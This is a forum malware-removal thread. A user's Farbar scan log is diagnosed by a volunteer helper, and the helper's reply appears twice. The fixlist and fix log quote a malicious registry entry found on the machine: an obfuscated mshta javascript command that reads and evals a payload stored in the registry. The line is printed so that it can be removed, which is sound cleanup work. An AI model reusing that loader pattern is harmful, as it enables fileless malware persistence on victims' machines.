2016-12-30 19:33 - 2016-12-05 02:17 - 00000930 _____ C:\Users\Public\Desktop\Battle.net.lnk
2016-12-30 19:33 - 2016-12-05 02:15 - 00001082 _____ C:\Users\Jeff\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Curse.lnk
2016-12-30 19:33 - 2016-12-05 02:15 - 00001076 _____ C:\Users\Jeff\Desktop\Curse.lnk
2016-12-30 19:33 - 2016-12-05 01:42 - 00001111 _____ C:\Users\Jeff\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Bitdefender Antivirus Free.lnk
2016-12-30 19:33 - 2016-12-05 01:27 - 00001318 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-12-30 19:33 - 2016-12-05 01:27 - 00001300 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-12-30 19:33 - 2016-12-05 01:10 - 00001019 _____ C:\Users\Jeff\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2016-12-30 19:24 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\security
2016-12-30 19:09 - 2016-12-05 01:09 - 00000000 ___RD C:\Users\Jeff\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
2016-12-30 19:07 - 2013-08-22 07:36 - 00000000 ____D C:\Program Files\Common Files
2016-12-30 13:40 - 2016-12-05 02:26 - 00000000 ____D C:\Program Files (x86)\Hearthstone
2016-12-29 20:46 - 2013-08-22 09:36 - 00000000 __RSD C:\WINDOWS\assembly
2016-12-29 20:21 - 2013-08-22 09:36 - 00000000 ___RD C:\WINDOWS\DesktopTileResources
2016-12-29 20:01 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\catroot2
2016-12-28 21:44 - 2016-12-05 01:09 - 00000000 ____D C:\Users\Jeff
2016-12-28 21:24 - 2016-12-11 05:43 - 00000000 __RDO C:\Users\Jeff\OneDrive
2016-12-28 21:24 - 2013-08-22 08:44 - 00337808 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-12-28 21:20 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\wdi
2016-12-28 21:16 - 2016-12-05 03:00 - 00524288 ___SH C:\WINDOWS\system32\config\DRIVERS{e1793794-0b3d-11e3-9dfe-80de722c933b}.TMContainer00000000000000000001.regtrans-ms
2016-12-28 21:16 - 2016-12-05 03:00 - 00065536 ___SH C:\WINDOWS\system32\config\DRIVERS{e1793794-0b3d-11e3-9dfe-80de722c933b}.TM.blf
2016-12-28 21:15 - 2013-08-22 09:36 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2016-12-28 21:15 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\sr-Latn-RS
2016-12-28 21:15 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\sr-Latn-CS
2016-12-28 21:15 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2016-12-28 21:14 - 2013-08-22 09:36 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-12-28 21:14 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\SysWOW64\en-US
2016-12-28 21:14 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\apppatch
2016-12-28 21:14 - 2013-08-22 07:36 - 00000000 __RSD C:\WINDOWS\Fonts
2016-12-28 21:14 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2016-12-28 21:05 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2016-12-27 21:46 - 2016-12-05 02:21 - 00000000 ____D C:\Users\Jeff\AppData\Roaming\Azureus
2016-12-22 16:42 - 2016-12-19 22:41 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-12-22 16:42 - 2016-12-19 22:41 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-12-20 00:09 - 2013-08-22 09:36 - 00001086 ___SH C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
 
==================== Files in the root of some directories =======
 
2016-12-28 20:56 - 2016-12-28 20:56 - 0000004 _____ () C:\Users\Jeff\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat
2016-12-23 02:40 - 2016-12-23 02:40 - 0002092 _____ () C:\Users\Jeff\AppData\Local\recently-used.xbel
2017-01-10 22:14 - 2016-11-23 07:37 - 0000570 _____ () C:\Users\Jeff\AppData\Local\TroubleshooterConfig.json
2016-12-05 01:46 - 2016-12-05 01:46 - 0028752 _____ () C:\ProgramData\agent.1480923965.bdinstall.bin
2016-12-05 02:45 - 2016-12-05 02:45 - 0029169 _____ () C:\ProgramData\agent.1480927550.bdinstall.bin
2017-01-19 01:22 - 2017-01-19 01:22 - 0028750 _____ () C:\ProgramData\agent.1484810568.bdinstall.bin
 
Some files in TEMP:
====================
C:\Users\Jeff\AppData\Local\Temp\BluestacksUninstaller.exe
C:\Users\Jeff\AppData\Local\Temp\BSvcProcessor.exe
C:\Users\Jeff\AppData\Local\Temp\BSvcUpdater.exe
C:\Users\Jeff\AppData\Local\Temp\HD-LibraryHandler.dll
C:\Users\Jeff\AppData\Local\Temp\HD-Logger-Native.dll
C:\Users\Jeff\AppData\Local\Temp\i4jdel0.exe
C:\Users\Jeff\AppData\Local\Temp\libeay32.dll
C:\Users\Jeff\AppData\Local\Temp\msvcr120.dll
C:\Users\Jeff\AppData\Local\Temp\sqlite3.dll
C:\Users\Jeff\AppData\Local\Temp\tu17p84.exe
C:\Users\Jeff\AppData\Local\Temp\yjhkuvi.exe
 
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-01-15 16:00
 
==================== End of FRST.txt ============================Attached File  Addition.txt   24.91KB   0 downloads

Attached Files



BC AdBot (Login to Remove)

 


#2 nasdaq

nasdaq

  • Malware Response Team
  • 38,580 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:03:01 AM

Posted 20 January 2017 - 10:46 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.

Please copy the entire contents of the code box below to a new file.
 
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

CHR Extension: (Chrome Web Store Payments) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-18]
CHR Extension: (Chrome Media Router) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm 
Task: {19FC8040-E91D-4B72-BB12-05234193E3A2} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe [2016-12-05] ()
AlternateDataStreams: C:\Users\Jeff\Desktop\FRST64.exe:BDU [0]
AlternateDataStreams: C:\Users\Jeff\Downloads\EmsisoftEmergencyKit.exe:BDU [0]
AlternateDataStreams: C:\Users\Jeff\Downloads\HijackThis.exe:BDU [0]
AlternateDataStreams: C:\Users\Jeff\Downloads\tdsskiller.exe:BDU [0]
AlternateDataStreams: C:\Users\Jeff\Downloads\VuzeBittorrentClientInstaller.exe:BDU [0]
HKU\.DEFAULT\Software\Classes\bad076f6: "C:\WINDOWS\system32\mshta.exe" "javascript:xZM5x="gEfoLFdU";hz1=new ActiveXObject("WScript.Shell");n1drZ="lbjPNb";J99EyX=hz1.RegRead("HKCU\\software\\kftdyzuxkf\\vjvb");LOfh1="vuEF5";eval(J99EyX);c5QgkhnS="mD";" <===== ATTENTION
FirewallRules: [{FDBB883F-7EE4-452A-9467-1E6EF3910881}] => C:\WINDOWS\system32\config\systemprofile\AppData\Local\BrowserAir\Application\BrowserairExec.exe
C:\WINDOWS\AutoKMS
C:\WINDOWS\system32\config\systemprofile\AppData\Local\BrowserAir

Reboot:

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Reset Chrome...
Open Google Chrome, click on menu icon google-chrome-setting-icon.png which is located right side top of the google chrome.
 
Click "Settings" then "Show advanced settings" at the bottom of the screen.
 
Click "Reset browser settings" button.
 
Restart Chrome.
===

Please let me know what problem persists with this computer.

#3 nasdaq

nasdaq

  • Malware Response Team
  • 38,580 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:03:01 AM

Posted 20 January 2017 - 10:46 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.

Please copy the entire contents of the code box below to a new file.
 
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

CHR Extension: (Chrome Web Store Payments) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-18]
CHR Extension: (Chrome Media Router) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm 
Task: {19FC8040-E91D-4B72-BB12-05234193E3A2} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe [2016-12-05] ()
AlternateDataStreams: C:\Users\Jeff\Desktop\FRST64.exe:BDU [0]
AlternateDataStreams: C:\Users\Jeff\Downloads\EmsisoftEmergencyKit.exe:BDU [0]
AlternateDataStreams: C:\Users\Jeff\Downloads\HijackThis.exe:BDU [0]
AlternateDataStreams: C:\Users\Jeff\Downloads\tdsskiller.exe:BDU [0]
AlternateDataStreams: C:\Users\Jeff\Downloads\VuzeBittorrentClientInstaller.exe:BDU [0]
HKU\.DEFAULT\Software\Classes\bad076f6: "C:\WINDOWS\system32\mshta.exe" "javascript:xZM5x="gEfoLFdU";hz1=new ActiveXObject("WScript.Shell");n1drZ="lbjPNb";J99EyX=hz1.RegRead("HKCU\\software\\kftdyzuxkf\\vjvb");LOfh1="vuEF5";eval(J99EyX);c5QgkhnS="mD";" <===== ATTENTION
FirewallRules: [{FDBB883F-7EE4-452A-9467-1E6EF3910881}] => C:\WINDOWS\system32\config\systemprofile\AppData\Local\BrowserAir\Application\BrowserairExec.exe
C:\WINDOWS\AutoKMS
C:\WINDOWS\system32\config\systemprofile\AppData\Local\BrowserAir

Reboot:

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Reset Chrome...
Open Google Chrome, click on menu icon google-chrome-setting-icon.png which is located right side top of the google chrome.
 
Click "Settings" then "Show advanced settings" at the bottom of the screen.
 
Click "Reset browser settings" button.
 
Restart Chrome.
===

Please let me know what problem persists with this computer.

#4 romeoashe

romeoashe
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  

Posted 21 January 2017 - 12:30 AM

Thank you nasdaq. Here is the requested log:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 18-01-2017
Ran by Jeff (20-01-2017 23:16:58) Run:1
Running from C:\Users\Jeff\Desktop
Loaded Profiles: Jeff (Available Profiles: Jeff)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
Start
 
CreateRestorePoint:
EmptyTemp:
CloseProcesses:
 
CHR Extension: (Chrome Web Store Payments) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-18]
CHR Extension: (Chrome Media Router) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm 
Task: {19FC8040-E91D-4B72-BB12-05234193E3A2} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe [2016-12-05] ()
AlternateDataStreams: C:\Users\Jeff\Desktop\FRST64.exe:BDU [0]
AlternateDataStreams: C:\Users\Jeff\Downloads\EmsisoftEmergencyKit.exe:BDU [0]
AlternateDataStreams: C:\Users\Jeff\Downloads\HijackThis.exe:BDU [0]
AlternateDataStreams: C:\Users\Jeff\Downloads\tdsskiller.exe:BDU [0]
AlternateDataStreams: C:\Users\Jeff\Downloads\VuzeBittorrentClientInstaller.exe:BDU [0]
HKU\.DEFAULT\Software\Classes\bad076f6: "C:\WINDOWS\system32\mshta.exe" "javascript:xZM5x="gEfoLFdU";hz1=new ActiveXObject("WScript.Shell");n1drZ="lbjPNb";J99EyX=hz1.RegRead("HKCU\\software\\kftdyzuxkf\\vjvb");LOfh1="vuEF5";eval(J99EyX);c5QgkhnS="mD";" <===== ATTENTION
FirewallRules: [{FDBB883F-7EE4-452A-9467-1E6EF3910881}] => C:\WINDOWS\system32\config\systemprofile\AppData\Local\BrowserAir\Application\BrowserairExec.exe
C:\WINDOWS\AutoKMS
C:\WINDOWS\system32\config\systemprofile\AppData\Local\BrowserAir
 
Reboot:
 
End
*****************
 
Restore point was successfully created.
Processes closed successfully.
C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda => moved successfully
CHR Extension: (Chrome Media Router) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm => not found
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{19FC8040-E91D-4B72-BB12-05234193E3A2} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{19FC8040-E91D-4B72-BB12-05234193E3A2} => key removed successfully
C:\WINDOWS\System32\Tasks\AutoKMS => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS => key removed successfully
C:\Users\Jeff\Desktop\FRST64.exe => ":BDU" ADS removed successfully.
C:\Users\Jeff\Downloads\EmsisoftEmergencyKit.exe => ":BDU" ADS removed successfully.
C:\Users\Jeff\Downloads\HijackThis.exe => ":BDU" ADS removed successfully.
C:\Users\Jeff\Downloads\tdsskiller.exe => ":BDU" ADS removed successfully.
C:\Users\Jeff\Downloads\VuzeBittorrentClientInstaller.exe => ":BDU" ADS removed successfully.
HKU\.DEFAULT\Software\Classes\bad076f6 => key removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{FDBB883F-7EE4-452A-9467-1E6EF3910881} => value removed successfully
C:\WINDOWS\AutoKMS => moved successfully
"C:\WINDOWS\system32\config\systemprofile\AppData\Local\BrowserAir" => not found.
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 50331648 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 7591866 B
Java, Flash, Steam htmlcache => 713 B
Windows/system/drivers => 54567660 B
Edge => 0 B
Chrome => 804750948 B
Firefox => 0 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 147492 B
systemprofile32 => 53208346 B
LocalService => 25097 B
NetworkService => 5066 B
Jeff => 189827290 B
 
RecycleBin => 15870727187 B
EmptyTemp: => 15.9 GB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 23:19:25 ====
 
 
This appears to have resolved my issue :)


#5 nasdaq

nasdaq

  • Malware Response Team
  • 38,580 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:03:01 AM

Posted 21 January 2017 - 08:40 AM

If all is well.

To learn more about how to protect yourself while on the internet read this little guide best security practices keep safe.
http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users